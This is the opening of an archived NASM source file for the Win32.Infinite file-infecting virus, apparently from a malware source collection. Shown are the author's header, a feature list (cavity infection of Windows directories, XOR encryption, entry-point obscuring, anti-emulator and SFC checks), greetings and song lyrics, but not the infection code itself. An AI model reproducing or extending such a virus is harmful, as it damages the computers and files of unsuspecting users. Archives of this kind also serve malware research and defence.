mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
1066 lines
35 KiB
NASM
1066 lines
35 KiB
NASM
;
|
||
;ÄÄÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄ¿
|
||
; ÚÄÜÜÜÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ [ Win32.Infinite Billy Belcebu/iKX ]
|
||
; ÀÄÛÛÛÄÛÛÛÛÛÛÄÄÄÛÛÛÛÛÄÄ¿ ÚÄÄÄÄÄÄ[ 1699 bytes Target - Win32 Ring3 ]ÄÄÄÄÄÄ
|
||
; ÚÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ ³ [ 17/07/00 - Made in Valencia, Spain ]
|
||
; ÀÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÄÄÙ
|
||
;
|
||
;
|
||
;
|
||
; [ Introduction ]
|
||
;
|
||
; Welcome to Infinite. This virus has been very rare for me, as its ambient
|
||
; of development was very odd. Well, it's my first virus using cavity tech,
|
||
; something that i thought that it was more difficult than it really was...
|
||
; I sincerely doubt that it would work in WinNT family (NT4,W2K), as i havent
|
||
; been able to test it there (Win2k has some incompatibilities with my
|
||
; 3DFX Voodoo2 and my soundcard), but i didn't wanted to change that thing of
|
||
; Win32. If it doesn't, i don't care... Blah blah blah, i've returned from my
|
||
; laaaarge VX holydays and i've just recently finished Forever and this babe.
|
||
; I hope i haven't lost my awesome code style (blah, just kidding... i don't
|
||
; have anything awesome besides the size of my dick - enormous) :)
|
||
; Oh, i almost forgot... I've realized that the cavity technique is stable
|
||
; most of the times, but it's not perfect, and i should do much more compro-
|
||
; bations before infection than the already existing ones, but i really don't
|
||
; care: Windows also has fails in its code and noone reminds it ;)
|
||
; It's not a special virus in any field, but i wanted to do some cavity stuff
|
||
; and here it is. Mwaha!
|
||
;
|
||
; [ Features ]
|
||
;
|
||
; + Cavity virus, searches for holes of zeroes or INT 3.
|
||
; + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories.
|
||
; + Simple & silly 8-byte XOR encryption loop
|
||
; + Kinda simple EPO with emulator protection
|
||
; + Checks for SFC protection (if it works in Win2k...)
|
||
; + CRC32 usage (APIs, extensions...)
|
||
; + It's intended to be optimized (not too much, but enough)
|
||
;
|
||
; [ Greetings ]
|
||
;
|
||
; This time the greets will go to few ppl. From the VX scene, to StarZer0,
|
||
; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon,
|
||
; and from outside to my best friends out there.Also to the people that tries
|
||
; to make this place we call world a much better place. You rule, guyz.
|
||
;
|
||
; [ Infinity - The song ]
|
||
;
|
||
; Mother watch your children
|
||
; The iron fist of fear is ruling our lives
|
||
; It's not too late to change the course
|
||
; We can make this world a better place to be in
|
||
;
|
||
; How much more do we want until we're satisfied?
|
||
; What happens when we have what we want?
|
||
; Acquiring more, still there's never enough
|
||
; We forget those who really are in need
|
||
; The end is near, or so they say
|
||
; Selling peace with guns
|
||
;
|
||
; Infinity - Where do we go from here?
|
||
; Infinity - Where do we go from here?
|
||
; Infinity - Where do we go?
|
||
; Infinity - Where do we go from here?
|
||
;
|
||
; Guns spitting (out the) message of peace everywhere
|
||
; Is it really that we don't care?
|
||
; See mercenaries of fear selling love
|
||
; Telling salvation comes from above
|
||
; Arrogance and fear walking hand in hand
|
||
; We must see that there's much more to life than this
|
||
;
|
||
; Mother see your children
|
||
; Make us understand to and help us to find the way
|
||
; The answers lie inside
|
||
; They are locked inside to the vault of truth of us
|
||
; It's time to spread the word around
|
||
; Be yourself and do what you want to do with your life
|
||
; Remember, you get just what you give
|
||
; You reap all what you sow
|
||
; You are in charge of your own life
|
||
;
|
||
; Infinity - Where do we go from here?
|
||
; Infinity - Where do we go from here?
|
||
; Infinity - Where do we go?
|
||
; Infinity - Where do we go from here?
|
||
;
|
||
; You make your own way
|
||
;
|
||
; ------------------------------------------
|
||
; Infinity - [ Stratovarius ] - ( Infinite )
|
||
;
|
||
; (c) 2000 Billy Belcebu/iKX [ http://beautifulpeople.cjb.net ]
|
||
|
||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
; º Win32.Infinite (c) 2000 Billy Belcebu/iKX º
|
||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
include host.inc ; Some nice includes
|
||
include infinite.inc
|
||
|
||
virseg segment dword use32 public |